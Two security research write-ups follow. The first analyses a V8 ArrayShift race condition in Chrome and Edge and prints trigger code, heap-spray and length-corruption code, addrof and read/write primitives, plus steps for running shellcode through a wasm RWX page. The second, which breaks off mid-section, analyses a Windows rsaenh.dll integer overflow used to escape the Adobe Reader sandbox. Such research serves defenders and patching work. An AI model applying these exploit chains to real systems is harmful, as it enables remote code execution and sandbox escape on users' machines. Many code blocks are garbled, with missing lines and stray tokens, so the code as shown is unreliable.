Google Chrome V8 ArrayShift Race Condition Remote Code Execution

By Javier Jimenez


This post describes a method of exploiting a race condition in the V8 JavaScript engine, version The vulnerability affects the following versions of Chrome and Edge:

  • Google Chrome versions between 90.0.4430.0 and 91.0.4472.100.
  • Microsoft Edge versions between 90.0.818.39 and 91.0.864.41.

The vulnerability occurs when one of the TurboFan jobs generates a handle to an object that is being modified at the same time by the ArrayShift built-in, resulting in a use-after-free (UaF) vulnerability. Unlike traditional UaFs, this vulnerability occurs within garbage-collected memory (UaF-gc). The bug lies within the ArrayShift built-in, as it lacks the necessary checks to prevent modifications on objects while other TurboFan jobs are running.

This post assumes the reader is familiar with all the elementary concepts needed to understand V8 internals and general exploitation. The references section contains links to blogs and documentation that describe prerequisite concepts such as TurboFan, Generational Garbage Collection, and V8 JavaScript Objects’ in-memory representation.

Table of Contents

The Vulnerability

When the ArrayShift built-in is called on an array object via Array.prototype.shift(), the length and starting address of the array may be changed while a compilation and optimization (TurboFan) job in the Inlining phase executes concurrently. When TurboFan reduces an element access of this array in the form of array[0], the function ReduceElementLoadFromHeapConstant() is executed on a different thread. This element access points to the address of the array being shifted via the ArrayShift built-in. If the ReduceElementLoadFromHeapConstant() function runs just before the shift operation is performed, it results in a dangling pointer. This is because Array.prototype.shift()frees” the object to which the compilation job still “holds” a reference. Both “free” and “hold” are not 100% accurate terms in this garbage collection context, but they serve the purpose of explaining the vulnerability conceptually. Later we describe these actions more accurately as “creating a filler object” and “creating a handler” respectively.

ReduceElementLoadFromHeapConstant() is a function that is called when TurboFan tries to optimize code that loads a value from the heap, such as array[0]. Below is an example of such code:

					function main() {
  let arr = new Array(500).fill(1.1);

  function load_elem() {
    let value = arr[0];
    for (let v19 = 0; v19 ﹤ 1500; v19++) {}

  for (let i = 0; i ﹤ 500; i++) {


By running the code above in the d8 shell with the command ./d8 --trace-turbo-reduction we observe, that the JSNativeContextSpecialization optimization, to which ReduceElementLoadFromHeapConstant() function belongs to, kicks in on node #27 by taking node #57 as its first input. Node #57  is the node for the array arr:

					$ ./d8 --trace-opt --trace-turbo-reduction /tmp/loadaddone.js
- Replacement of #13: JSLoadContext[0, 2, 1](3, 7) with #57: HeapConstant[0x234a0814848d ﹤JSArray[500]﹥] by reducer JSContextSpecialization
- Replacement of #27: JSLoadProperty[sloppy, FeedbackSource(#0)](57, 23, 4, 3, 28, 24, 22) with #64: CheckFloat64Hole[allow-return-hole, FeedbackSource(INVALID)](63, 63, 22) by reducer JSNativeContextSpecialization


Therefore, executing the Array.prototype.shift() method on the same array, arr, during the execution of the aforementioned TurboFan job may trigger the vulnerability. Since this is a race condition, the vulnerability may not trigger reliably. The reliability depends on the resources available for the V8 engine to use.

The following is a minimal JavaScript test case that triggers a debug check on a debug build of d8:

					function main() {
  let arr = new Array(500).fill(1.1);

  function bug() {

// [1]

    let a = arr[0];

// [2]
    for (let v19 = 0; v19 < 1500; v19++) {}

// [3]

  for (let i = 0; i < 500; i++) {


The loop at [3] triggers the compilation of the bug() function since it’s a “hot” function. This starts a concurrent compilation job for the function where [1] will force a call to ReduceElementLoadFromHeapConstant(), to reduce the load at index 0 for a constant value. While TurboFan is running on a different thread, the main thread executes the shift operation on the same array [2], modifying it. However, this minimized test case does not trigger anything further than an assertion (via DCHECK) on debug builds. Although the test case executes without fault on a release build, it is sufficient to understand the rest of the analysis.

The following numbered steps show the order of execution of code that results in the use-after-free. The end result, at step 8, is the TurboFan thread pointing to a freed object:

Steps in use-after-free
Triggering the race condition

In order to achieve a dangling pointer, let’s figure out how each thread holds a reference in V8’s code.

Reference from the TurboFan Thread

Once the TurboFan job is fired, the following code will get executed:

					// src/compiler/ 

Reduction JSNativeContextSpecialization::ReduceElementLoadFromHeapConstant(
    Node* node, Node* key, AccessMode access_mode,
    KeyedAccessLoadMode load_mode) {


  HeapObjectMatcher mreceiver(receiver);
  HeapObjectRef receiver_ref = mreceiver.Ref(broker());



  NumberMatcher mkey(key);
  if (mkey.IsInteger() &&;
      mkey.IsInRange(0.0, static_cast(JSObject::kMaxElementIndex))) {
    STATIC_ASSERT(JSObject::kMaxElementIndex <= kMaxUInt32);
    const uint32_t index = static_cast(mkey.ResolvedValue());
    base::Optional element;

    if (receiver_ref.IsJSObject()) {


      element = receiver_ref.AsJSObject().GetOwnConstantElement(index);


Since this reduction is done via ReducePropertyAccess() there is an initial check at [1] to know whether the access to be reduced is actually in the form of an array index access and whether the receiver is a JavaScript object. After that is verified, the GetOwnConstantElement() method is called on the receiver object at [2] to retrieve a constant element from the calculated index.

					// src/compiler/

base::Optional﹤ObjectRef﹥ JSObjectRef::GetOwnConstantElement(
    uint32_t index, SerializationPolicy policy) const {


  if (data_->should_access_heap() || FLAG_turbo_direct_heap_access) {



    base::Optional﹤FixedArrayBaseRef﹥ maybe_elements_ref = elements();



The code at [3] verifies whether the current caller should access the heap. The verification passes since the reduction is for loading an element from the heap. The flag FLAG_turbo_direct_heap_access is enabled by default. Then, at [4] the elements() method is called with the intention of obtaining a reference to the elements of the receiver object (the array). The  elements() method is shown below:

					// src/compiler/
base::Optional JSObjectRef::elements() const {
  if (data_->should_access_heap()) {


    return FixedArrayBaseRef(
        broker(), broker()->CanonicalPersistentHandle(object()->elements()));


// File: src/objects/js-objects-inl.h
DEF_GETTER(JSObject, elements, FixedArrayBase) {
  return TaggedField::load(cage_base, *this);

Further down the call stack, elements() will call CanonicalPersistentHandle() with a reference to the elements of the receiver object, denoted by object()->elements() at [5]. This elements() method call is different than the previous. This one directly accesses the heap and returns the pointer within the V8 heap. It accesses the same pointer object in memory as the ArrayShift built-in.

Finally, CanonicalPersistentHandle() will create a Handle reference. Handles in V8 are objects that are exposed to the JavaScript environment. The most notable property is that they are tracked by the garbage collector.

					// File: src/compiler/js-heap-broker.h

  template ﹤typename T﹥
  Handle﹤T﹥ CanonicalPersistentHandle(T object) {
    if (canonical_handles_) {


    } else {


      return Handle﹤T﹥(object, isolate());

The Handle created at [6] is now exposed to the JavaScript environment and a reference is held while the compilation job is being executed. At this point, if any other parts of the process modify the reference, for example, forcing a free on it, the TurboFan job will hold a dangling pointer. Exploiting the vulnerability relies on this behavior. In particular, knowing the precise point when the TurboFan job runs allows us to keep the bogus pointer within our reach.

Reference from the Main Thread (ArrayShift Built-in)

Once the code depicted in the previous section is running and it passes the point where the Handle to the array was created, executing the ArrayShift JavaScript function on the same array triggers the vulnerability. The following code is executed:

					// File: src/builtins/

BUILTIN(ArrayShift) {
  HandleScope scope(isolate);

  // 1. Let O be ? ToObject(this value).
  Handle receiver;


      isolate, receiver, Object::ToObject(isolate, args.receiver()));


  if (CanUseFastArrayShift(isolate, receiver)) {


    Handle array = Handle::cast(receiver);
    return *array->GetElementsAccessor()->Shift(array);



At [1], the receiver object (arr in the original JavaScript test case) is assigned to the receiver variable via the ASSIGN_RETURN_FAILURE_ON_EXCEPTION macro. It then uses this receiver variable [2] to create a new Handle of the JSArray type in order to call the Shift() function on it.

Conceptually, the shift operation on an array performs the following modifications to the array in the V8 heap:

ArrayShift operation on an Array of length 8

Two things change in memory: the pointer that denotes the start of the array is incremented, and the first element is overwritten by a filler object (which we referred to as “freed”). The filler is a special type of object described further below. With this picture in mind, we can continue the analysis with a clear view of what is happening in the code.

Prior to any manipulations of the array object, the following function calls are executed, passing the array (now of Handle<JSArray> type) as an argument:

					// File: src/objects/

  Handle﹤Object﹥ Shift(Handle﹤JSArray﹥ receiver) final {


    return Subclass::ShiftImpl(receiver);


  static Handle﹤Object﹥ ShiftImpl(Handle﹤JSArray﹥ receiver) {


    return Subclass::RemoveElement(receiver, AT_START);


static Handle﹤Object﹥ RemoveElement(Handle﹤JSArray﹥ receiver,
                                      Where remove_position) {



    Handle﹤FixedArrayBase﹥ backing_store(receiver-﹥elements(), isolate);


    if (remove_position == AT_START) {


      Subclass::MoveElements(isolate, receiver, backing_store, 0, 1, new_length,
                             0, 0);



Shift() at [3] simply calls ShiftImpl(). Then, ShiftImpl() at [4] calls RemoveElement(), passing the index as a second argument within the AT_START variable. This is to depict the shift operation, reminding us that it deletes the first object (index position 0) of an array.

Within the RemoveElement() function, the elements() function from the src/objects/js-objects-inl.h file is called again on the same receiver object and a Handle is created and stored in the backing_store variable. At [5] we see how the reference to the same object as the previous TurboFan job is created.

Finally, a call to MoveElements() is made [6] in order to perform the shift operation.

					// File: src/objects/

  static void MoveElements(Isolate* isolate, Handle﹤JSArray﹥ receiver,
                           Handle﹤FixedArrayBase﹥ backing_store, int dst_index,
                           int src_index, int len, int hole_start,
                           int hole_end) {
    DisallowGarbageCollection no_gc;


    BackingStore dst_elms = BackingStore::cast(*backing_store);
    if (len ﹥ JSArray::kMaxCopyElements && dst_index == 0 &&


        isolate-﹥heap()-﹥CanMoveObjectStart(dst_elms)) {
      dst_elms = BackingStore::cast(


          isolate-﹥heap()-﹥LeftTrimFixedArray(dst_elms, src_index));


In MoveElements(), the variables dst_index and src_index hold the values 0 and 1 respectively, since the shift operation will shift all the elements of the array from index 1, and place them starting at index 0, effectively removing position 0 of the array. It starts by casting the backing_store variable to a BackingStore object and storing it in the dst_elms variable [7]. This is done to execute the CanMoveObjectStart() function, which checks whether the array can be moved in memory [8]. 

This check function is where the vulnerability resides. The function does not check whether other compilation jobs are running. If such a check passes, dst_elms (the reference to the elements) of the target array, will be passed onto LeftTrimFixedArray(), which will perform modifying operations on it.

					// File: src/heap/


bool Heap::CanMoveObjectStart(HeapObject object) {
  if (!FLAG_move_object_start) return false;

  // Sampling heap profiler may have a reference to the object.
  if (isolate()-﹥heap_profiler()-﹥is_sampling_allocations()) return false;

  if (IsLargeObject(object)) return false;

  // We can move the object start if the page was already swept.
  return Page::FromHeapObject(object)-﹥SweepingDone();

In a vulnerable V8 version, we can see that while the CanMoveObjectStart() function at [10] checks for things such as the profiler holding references to the object or the object being a large object, the function does not contain any checks for concurrent compilation jobs. Therefore all checks will pass and the function will return True, leading to the LeftTrimFixedArray() function call with dst_elms as the first argument.

					// File: src/heap/

FixedArrayBase Heap::LeftTrimFixedArray(FixedArrayBase object,
                                        int elements_to_trim) {


  const int element_size = object.IsFixedArray() ? kTaggedSize : kDoubleSize;
  const int bytes_to_trim = elements_to_trim * element_size;



  // Calculate location of new array start.
  Address old_start = object.address();
  Address new_start = old_start + bytes_to_trim;



  CreateFillerObjectAt(old_start, bytes_to_trim,
                           ? ClearRecordedSlots::kYes
                           : ClearRecordedSlots::kNo);


  if (FLAG_enable_slow_asserts) {
    // Make sure the stack or other roots (e.g., Handles) don't contain pointers
    // to the original FixedArray (which is now the filler object).
    SafepointScope scope(this);
    LeftTrimmerVerifierRootVisitor root_visitor(object);


    IterateRoots(&root_visitor, {});


At [11] the address of the object, given as the first argument to the function, is stored in the old_start variable. The address is then used to create a Fillerobject [12]. Fillers, in garbage collection, are a special type of object that serves the purpose of denoting a free space without actually freeing it, but with the intention of ensuring that there is a contiguous space of objects for a garbage collection cycle to iterate over. Regardless, a Filler object denotes a free space that can later be reclaimed by other objects. Therefore, since the compilation job also has a reference to this object’s address, the optimization job now points to a Filler object which, after a garbage collection cycle, will be a dangling pointer.

For completion, the marker at [13] shows the place where debug builds would bail out. The IterateRoots() function takes a variable created from the initial object (dst_elms) as an argument, which is now a Filler, and checks whether there is any other part in V8 that is holding a reference to it. In the case there is a running compilation job holding said reference, this function will crash the process on debug builds.


Exploiting this vulnerability involves the following steps:

  • Triggering the vulnerability by creating an Array barr and forcing a compilation job at the same time as the ArrayShift built-in is called.
  • Triggering a garbage collection cycle in order to reclaim the freed memory with Array-like objects, so that it is possible to corrupt their length.
  • Locating the corrupted array and a marker object to construct the addrof, read, and write primitives.
  • Creating and instantiating a wasm instance with an exported main function, then overwriting the main exported function’s shellcode.
  • Finally, calling the exported main function, running the previously overwritten shellcode.

After reclaiming memory, there’s the need to find certain markers in memory, as the objects that reclaim memory might land at different offsets every time. Due to this, should the exploit fail to reproduce, it needs to be restarted to either win the race or correctly find the objects in the reclaimed space. The possible causes of failure are losing the race condition or the spray not being successful at placing objects where they’re needed.

Triggering the Vulnerability

Again, let’s start with a test case that triggers an assert in debug builds. The following JavaScript code triggers the vulnerability, crashing the engine on debug builds via a DCHECK_NE statement:

					 function trigger() {


    let buggy_array_size = 120;
    let PUSH_OBJ = [324];
    let barr = [1.1];
    for (let i = 0; i ﹤ buggy_array_size; i++) barr.push(PUSH_OBJ);

    function dangling_reference() {


      for (let i = 0; i ﹤ 10000; i++) { console.i += 1; }
      let a = barr[0];


      function gcing() {
        const v15 = new Uint8ClampedArray(buggy_array_size*0x400000);
      let gcit = gcing();
      for (let v19 = 0; v19 ﹤ 500; v19++) {}


    for (let i = 0; i ﹤ 4; i++) {


Trigerring the vulnerabiliy comprises the following steps:

  • At [1] an array barr is created by pushing objects PUSH_OBJ into it. These serve as a marker at later stages.
  • At [2] the bug is triggered by performing the shift on the barr array. A for loop triggers the compilation early, and a value from the array is loaded to trigger the right optimization reduction.
  • At [3] the gcing() function is responsible for triggering a garbage collection after each iteration. When the vulnerability is triggered, the reference to barr is freed. A dangling pointer is then held at this point.
  • At [4] there is the need to stop executing the function to be optimized exactly on the iteration that it gets optimized. The concurrent reference to the Filler object is obtained only at this iteration.

Reclaiming Memory and Corrupting an Array Length

The next excerpt of the code explains how the freed memory is reclaimed by the desired arrays in the full exploit. The goal of the following code is to get the elements of barr to point to the tmpfarr and tmpMarkerArray objects in memory, so that the length can be corrupted to finally build the exploit primitives.

Leveraging the barr array

The above image shows how the elements of the barr array are altered throughout the exploit. We can see how, in the last state, barr‘s elements point to the in-memory JSObjects tmpfarr and tmpArrayMarker, which will allow corrupting their lengths via statements like barr[2] = 0xffff. Bear in mind that the images are not comprehensive. JSObjects represented in memory contain fields, such as Map or array length, that are not shown in the above image. Refer to the References section for details on complete structures.

					let size_to_search = 0x8c;
let next_size_to_search = size_to_search+0x60;
let arr_search = [];
let tmparr = new Array(Math.floor(size_to_search)).fill(9.9);
let tmpMarkerArray =  new Array(next_size_to_search).fill({
  a: placeholder_obj, b: placeholder_obj, notamarker: 0x12341234, floatprop: 9.9
let tmpfarr= [...tmparr];
let new_corrupted_length = 0xffff;

for (let v21 = 0; v21 ﹤ 10000; v21++) {




  if (barr[0] != PUSH_OBJ) {
    for (let i = 0; i ﹤ 100; i++) {


      if (barr[i] == size_to_search) {


        if (barr[i+12] != next_size_to_search) continue;


        barr[i] = new_corrupted_length;

for (let i = 0; i ﹤ arr_search.length; i++) {


  if (arr_search[i]?.length == new_corrupted_length) {
    return [arr_search[i], {
      a: placeholder_obj, b: placeholder_obj, findme: 0x11111111, floatprop: 1.337

In the following, we describe the above code that alters barr‘s element as shown in the previous figure.

  • Within a loop at [1], several arrays are pushed into another array with the intention of reclaiming the previously freed memory. These actions trigger garbage collection, so that when the memory is freed, the object is moved and overwritten by the desired arrays (tmpfarr and tmpMarkerArray).
  • The check at [2] observes that the array no longer contains any of the initial values pushed. This means that the vulnerability has been triggered correctly and barr now points to some other part of memory.
  • The intention of the check at [3] is to identify the array element that holds the length of the tmpfarr array.
  • The check at [4] verifies that the adjacent object has the length for tmpMarkerArray.
  • The length of the tmpfarr is then overwritten at [5] with a large value, so that it can be used to craft the exploit primitives.
  • Finally at [6], a search for the corrupted array object is performed by querying for the new corrupted length via the JavaScript length property. One thing to note is the optional chaining ?. This is needed here because arr_search[i] might be an undefined value without the length property, breaking JavaScript execution. Once found, the corrupted array is returned.

Creating and Locating the Marker Object

Once the length of an array has been corrupted, it allows reading and writing out-of-bounds within the V8 heap. Certain constraints apply, as reading too far could cause the exploit to fail. Therefore a cleaner way to read-write within the V8 heap and to implement exploit primitives such as addrof is needed.


for (let i = size_to_search; i ﹤ new_corrupted_length/2; i++) {


  for (let spray = 0; spray ﹤ 50; spray++) {
    let local_findme = {
      a: placeholder_obj, b: placeholder_obj, findme: 0x11111111, floatprop: 1.337, findyou:0x12341234
    function gcing() {
      const v15 = new String("Hello, GC!");
  if (marker_idx != -1) break;


  if (f2string(cor_farr[i]).includes("22222222")){
    print(`Marker at ${i} =﹥ ${f2string(cor_farr[i])}`);
    let aux_ab = new ArrayBuffer(8);
    let aux_i32_arr = new Uint32Array(aux_ab); 
    let aux_f64_arr = new Float64Array(aux_ab);
    aux_f64_arr[0] = cor_farr[i];


    if (aux_i32_arr[0].toString(16) == "22222222") {
      aux_i32_arr[0] = 0x44444444;
    } else {
      aux_i32_arr[1] = 0x44444444;
    cor_farr[i] = aux_f64_arr[0];


    for (let j = 0; j ﹤ objarr.length; j++) {
      if (objarr[j].findme != 0x11111111) {
        leak_obj = objarr[j];
        if (leak_obj.findme != 0x11111111) {
          print(`Found right marker at ${i}`);
          marker_idx = i;
  • A for loop [1] traverses the array with corrupted length cor_farr. Note that this is one of the parts of potential failure in the exploit. Traversing too far into the corrupted array will likely result in a crash due to reading past the boundaries of the memory page. Thus, a value such as new_corrupted_length/2 was selected at the time of development which was the output of several tests.
  • Before starting to traverse the corrupted array, a minimal memory spray is attempted at [2] in order to have the wanted local_findme object right in the memory pointed by cor_farr. Furthermore, garbage collection is triggered in order to trigger compaction of the newly sprayed objects with the intention of making them adjacent to cor_farr elements.
  • At [3] f2string converts the float value of cor_farr[i] to a string value. This is then checked against the value 22222222 because V8 represents small integers in memory with the last bit set to 0 by left shifting the actual value by one. So 0x11111111 << 1 == 0x22222222 which is the memory value of the small integer property local_findme.findme. Once the marker value is found, several “array views” (Typed Arrays) are constructed in order to change the 0x22222222 part and not the rest of the float value. This is done by creating a 32-bit view aux_i32_arr and a 64-bit aux_f64_arr view on the same buffer aux_ab.
  • A check is performed at [4] to know wether the marker is found in the higher or the lower 32-bit. Once determined, the value is changed for 0x44444444 by using the auxiliary array views.
  • Finally at [5], the objarr array is traversed in order to find the changed marker and the index marker_idx is saved. This index and leak_obj are used to craft exploit primitives within the V8 heap.

Exploit Primitives

The following sections are common to most V8 exploits and are easily accessible from other write-ups. We describe these exploit primitives to explain the caveat of having to deal with the fact that the spray might have resulted in the objects being unaligned in memory.

Address of an Object

					function v8h_addrof(obj) {


  leak_obj.a = obj;
  leak_obj.b = obj;

  let aux_ab = new ArrayBuffer(8);
  let aux_i32_arr = new Uint32Array(aux_ab); 
  let aux_f64_arr = new Float64Array(aux_ab);


  aux_f64_arr[0] = cor_farr[marker_idx - 1];


  if (aux_i32_arr[0] != aux_i32_arr[1]) {
    aux_i32_arr[0] = aux_i32_arr[1]

  let res = BigInt(aux_i32_arr[0]);

  return res;

The above code presents the addrof primitive and consists of the following steps:

  • First, at [1], the target object to leak is placed within the properties a and b of leak_obj and auxiliary array views are created in order to read from the corrupted array cor_farr.
  • At [2], the properties are read from the corrupted array by subtracting one from the marker_idx. This is due to the leak_obj having the properties next to each other in memory; therefore a and b precede the findme property.
  • By checking the upper and lower 32-bits of the read float value at [3], it is possible to tell whether the a and b values are aligned. In case they are not, it means that only the higher 32-bits of the float value contains the address of the target object. By assigning it back to the index 0 of the aux_i32_arr, the function is simplified and it is possible to just return the leaked value by always reading from the same index.

Reading and Writing on the V8 Heap

Depending on the architecture and whether pointer compression is enabled (default on 64-bit architectures), there will be situations where it is needed to read either just a 32-bit tagged pointer (e.g. an object) or a full 64-bit address. The latter case only applies to 64-bit architectures due to the need of manipulating the backing store of a Typed Array as it will be needed to build an arbitrary read and write primitive outside of the V8 heap boundaries.

Below we only present the 64-bit architecture read/write. Their 32-bit counterparts do the same, but with the restriction of reading the lower or higher 32-bit values of the leaked 64-bit float value.

					function v8h_read64(v8h_addr_as_bigint) {
  let ret_value = null;
  let restore_value = null;
  let aux_ab = new ArrayBuffer(8);
  let aux_i32_arr = new Uint32Array(aux_ab); 
  let aux_f64_arr = new Float64Array(aux_ab);
  let aux_bint_arr = new BigUint64Array(aux_ab);


  aux_f64_arr[0] = cor_farr[marker_idx];
  let high = aux_i32_arr[0] == 0x44444444;


  if (high) {
    restore_value = aux_f64_arr[0];
    aux_i32_arr[1] = Number(v8h_addr_as_bigint-4n);
    cor_farr[marker_idx] = aux_f64_arr[0];
  } else {
    aux_f64_arr[0] = cor_farr[marker_idx+1];
    restore_value = aux_f64_arr[0];
    aux_i32_arr[0] = Number(v8h_addr_as_bigint-4n);
    cor_farr[marker_idx+1] = aux_f64_arr[0];


  aux_f64_arr[0] = leak_obj.floatprop;
  ret_value = aux_bint_arr[0];
  cor_farr[high ? marker_idx : marker_idx+1] = restore_value;
  return ret_value;

The 64-bit architecture read consists of the following steps:

  • At [1], a check for alignment is done via the marker_idx: if the marker is found in the lower 32-bit value via aux_i32_arr[0], it means that the leak_obj.floatprop property is in the upper 32-bit (aux_i32_arr[1]).
  • Once alignment has been determined, next at [2] the address of the leak_obj.floatprop property is overwritten with the desired address provided by the argument v8h_addr_as_bigint. In addition, 4 bytes are subtracted from the target address because V8 will add 4 with the intention of skipping the map pointer to read the float value.
  • At [3], the leak_obj.floatprop points to the target address in the V8 heap. By reading it through the property, it is possible to obtain 64-bit values as floats and make the conversion with the auxiliary arrays.

This function can also be used to write 64-bit values by adding a value to write as an extra argument and, instead of reading the property, writing to it.

					function v8h_write64(what_as_bigint, v8h_addr_as_bigint) {


    aux_bint_arr[0] = what_as_bigint;
    leak_obj.floatprop = aux_f64_arr[0];


As mentioned at the beginning of this section, the only changes required to make these primitives work on 32-bit architectures are to use the provided auxiliary 32-bit array views such as aux_i32_arr and only write or read on the upper or lower 32-bit, as the following snippet shows:


    aux_f64_arr[0] = leak_obj.floatprop;
    ret_value = aux_i32_arr[0];


Using the Exploit Primitives to Run Shellcode

The following steps to run custom shellcode on 64-bit architectures are public knowledge, but are summarized here for the sake of completion:

  1. Create a wasm module that exports a function (eg: main).
  2. Create a wasm instance object WebAssembly.Instance.
  3. Obtain the address of the wasm instance using the addrof primitive
  4. Read the 64bit pointer within the V8 heap at the wasm instance plus 0x68. This will retrieve the pointer to a rwx page where we can write our shellcode to.
  5. Now create a Typed Array of Uint8Array type.
  6. Obtain its address via the addrof function.
  7. Write the previously obtained pointer to the rwx page into the backing store of the Uint8Array, located 0x28 bytes from the Uint8Array address obtained in step 6.
  8. Write your desired shellcode into the Uint8Array one byte at a time. This will effectively write into the rwx page.
  9. Finally, call the main function exported in step 1.


This vulnerability was made possible by a Feb 2021 commit that introduced direct heap reads for JSArrayRef, allowing for the retrieval of a handle. Furthermore, this bug would have flown under the radar if not for another commit in 2018 that introduced measures to crash when double references are held during shift operation on arrays. This vulnerability was patched in June 2021 by disabling left-trimming when concurrent compilation jobs are being executed

The commits and their timeline show that it is not easy for developers to write secure code in a single go, especially in complex environments like JavaScript engines that also include fully-fledged optimizing compilers running concurrently.

We hope you enjoyed reading this. If you are hungry for more, make sure to check our other blog posts.

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Escaping Adobe Sandbox: Exploiting an Integer Overflow in Microsoft Windows Crypto Provider

By Michele Campa


We describe a method to exploit a Windows Nday vulnerability to escape the Adobe sandbox. This vulnerability is assigned CVE-2021-31199 and it is present in multiple Windows 10 versions. The vulnerability is an out-of-bounds write due to an integer overflow in a Microsoft Cryptographic Provider library, rsaenh.dll.

Microsoft Cryptographic Provider is a set of libraries that implement common cryptographic algorithms. It contains the following libraries:
  • dssenh.dll  – Algorithms to exchange keys using Diffie-Hellman or to sign/verify data using DSA.
  • rsaenh.dll  – Algorithms to work with RSA.
  • basecsp.dll – Algorithms to work with smart cards.

These providers are abstracted away by API in the CryptSP.dll library, which acts as an interface that developers are expected to use. Each call to the API expects an HCRYPTPROV object as argument. Depending on certains fields in this object, CryptSP.dll redirects the code flow to the right provider. We will describe the HCRYPTPROV object in more detail when describing the exploitation of the vulnerability.

Cryptographic Provider Dispatch

Adobe Sandbox Broker Communication

Both Adobe Acrobat and Acrobat Reader run in Protected Mode by default. The protected mode is a feature that allows opening and displaying PDF files in a restricted process, a sandbox. The restricted process cannot access resources directly. Restrictions are imposed upon actions such as accessing the file system and spawning processes. A sandbox makes achieving arbitrary code execution on a compromised system harder.
Adobe Acrobat and Acrobat Reader use two processes when running in Protected Mode:
  • The Broker process, which provides limited and safe access to the sandboxed code.
  • The Sandboxed process, which processes and displays PDF files.
When the sandbox needs to execute actions that cannot be directly executed, it emits a request to the broker through a well defined IPC protocol. The broker services such requests only after ensuring that they satisfy a configured policy.
Sandbox and Broker

Sandbox Broker Communication Design

The communication between broker and sandbox happens via a shared memory that acts like a message channel. It informs the other side that a message is ready to be processed or that a message has been processed and the response is ready to be read.
On startup the broker initializes a shared memory of size 2MB and initializes the event handlers. Both, the event handlers and the shared memory are duplicated and written into the sandbox process via WriteProcessMemory().
When the sandbox needs to access a resource, it prepares the message in the shared memory and emits a signal to inform the broker. On the other side, once the broker receives the signal it starts processing the message and emits a signal to the sandbox when the message processing is complete.
Communication between Sandbox and Broker
The elements involved in the Sandbox-Broker communication are as follows:
  • Shared memory with RW permissions of size 2MB is created when the broker starts. It is mapped into the child process, i.e. the sandbox.
  • Signals and atomic instructions are used to synchronize access to the shared memory.
  • Multiple channels in the shared memory allow bi-directional communication by multiple threads simultaneously.
In summary, when the sandbox process cross-calls a broker-exposed resource, it locks the channel, serializes the request and pings the broker. Finally it waits for broker and reads the result.


The vulnerability occurs in the rsaenh.dll:ImportOpaqueBlob() function when a crafted opaque key blob is imported. This routine is reached from the Crypto Provider interface by calling CryptSP:CryptImportKey() that leads to a call to the CPImportKey() function, which is exposed by the Crypto Provider.
					// rsaenh.dll

__int64 __fastcall CPImportKey(
        __int64 hcryptprov,
        char *key_to_imp,
        unsigned int key_len,
        __int64 HCRYPT_KEY_PUB,
        unsigned int flags,


  v7 = key_len;
  v9 = hcryptprov;
  *(_QWORD *)v116 = hcryptprov;
  NewKey = 1359;


  v12 = 0i64;
  if ( key_len
    &amp;&amp; key_len = key_len )
    if ( (unsigned int)VerifyStackAvailable() )


      v13 = (unsigned int)(v7 + 8) + 15i64;
      if ( v13 = (unsigned int)v7 )
        v39 = (char *)((__int64 (__fastcall *)(_QWORD))g_pfnAllocate)((unsigned int)(v7 + 8));
        v12 = v39;




      goto LABEL_14;




  memcpy_0(v12, key_to_imp, v7);
  v15 = 1;
  v107 = 1;
  v9 = *(_QWORD *)v116;



  v18 = NTLCheckList(v9, 0);
  v113 = (const void **)v18;



  if ( v12[1] != 2 )


  if ( v16 == 6 )


  switch ( v16 )
    case 1:


    case 7:


    case 8:


    case 9:


      NewKey = ImportOpaqueBlob(v19, (uint8_t *)v12, v7, HCRYPT_KEY_OUT);
      if ( !NewKey )
        goto LABEL_30;
      v40 = WPP_GLOBAL_Control;
      if ( WPP_GLOBAL_Control == &amp;WPP_GLOBAL_Control || (*((_BYTE *)WPP_GLOBAL_Control + 28) &amp; 1) == 0 )
        goto LABEL_64;
      v41 = 210;
      goto LABEL_78;
    case 11:


    case 12:





Before reaching ImportOpaqueBlob() at [5], the key to import is allocated on the stack or on the heap according to the available stack space at [1]. The key to import is copied, at [2], into the new memory allocated; the public key struct version member is expected to be 2. The HCRYPTPROV object pointer is decrypted at [3], and then at [4] the key version is checked to be equal to 2. Finally a switch case on the type field of the key to import leads to executing ImportOpaqueBlob() at [5]. This occurs if and only if the type member is equal to OPAQUEKEYBLOB (0x9).

The OPAQUEKEYBLOB indicates that the key is a session key (as opposed to public/private keys).

					__int64 __fastcall ImportOpaqueBlob(__int64 a1, uint8_t *key_, unsigned int len_, unsigned __int64 *out_phkey)


    *out_phkey = 0i64;
    v8 = 0xC0;


    if ( len_ < 0x70 )


        return v10;


    v13 = *((_DWORD *)key_ + 5); // read 4 bytes from (uint8_t*)key + 0x14
    if ( v13 )
        v8 = v13 + 0xC8;
    v14 = *((_DWORD *)key_ + 4); // read 4 bytes from (uint8_t*)key + 0x10
    if ( v14 )
        v8 += v14 + 8;
    v15 = (char *)ContAlloc(v8);
    v16 = v15;
    if ( v15 )
        memset_0(v15, 0, v8);


        v17 = *((unsigned int *)key_ + 4); // key + 0x10


        v18 = v17 + 0x70;
        v19 = *((_DWORD *)key_ + 5);
        if ( v19 )
          v18 = v19 + v17 + 0x70;


        if ( len_ >= v18 )      // key + 0x10
            if ( (_DWORD)v17 )


                *((_QWORD *)v16 + 3) = v16 + 0xC8;
                memcpy_0(v16 + 0xC8, key_ + 0x70, v17);




      if ( v16 )
      return v10;


  return v10;

In order to reach the vulnerable code, it is required that the key to import has more than 0x70 bytes [6]. The vulnerability occurs due to an integer overflow that happens at [7] due to a lack of checking the values at addresses (unsigned int)((uint8_t*)key + 0x14) and (unsigned int)((uint8_t*)key + 0x10). For example if one of these members is set to 0xffffffff, an integer overflow occurs. The vulnerability is triggered when the memcpy() routine is called to copy (unsigned int)((uint8_t*)key + 0x10) bytes from key + 0x70 into v16 + 0xc8 at [9].

An example of an opaque blob that triggers the vulnerability is the following: if key + 0x10 is set to 0x120 and key + 0x14 equals 0xffffff00, then it leads to allocating 0x120 + 0xffffff00 + 0xc8 + 0x08 = 0xf0 bytes of buffer, into which 0x120 bytes are copied. The integer overflow allows bypassing a weak check, at [8], which requires the key length to be greater than: 0x120 + 0xffffff00 + 0x70 = 0x90.


The goal of exploiting this vulnerability is to escape the Adobe sandbox in order to execute arbitrary code on the system with the privileges of the broker process. It is assumed that code execution is already possible in the Adobe sandbox.

Exploit Strategy

The Adobe broker exposes cross-calls such as CryptImportKey() to the sandboxed process. The vulnerability can be triggered by importing a crafted key into the Crypto Provider Service, implemented in rsaenh.dll. The vulnerability yields an out-of-bounds write primitive in the broker, which can be easily used to corrupt function pointers. However, Adobe Reader enables a large number of security features including ASLR and Control Flow Guard (CFG), which effectively prevent ROP chains from being used directly to gain control of the execution flow.
The exploitation strategy described in this section involves bypassing CFG by abusing a certain design element of the Microsoft Crypto Provider. In particular, the interface that redirects code flow according to function pointers stored in the HCRYPTPROV object.

CryptSP – Context Object

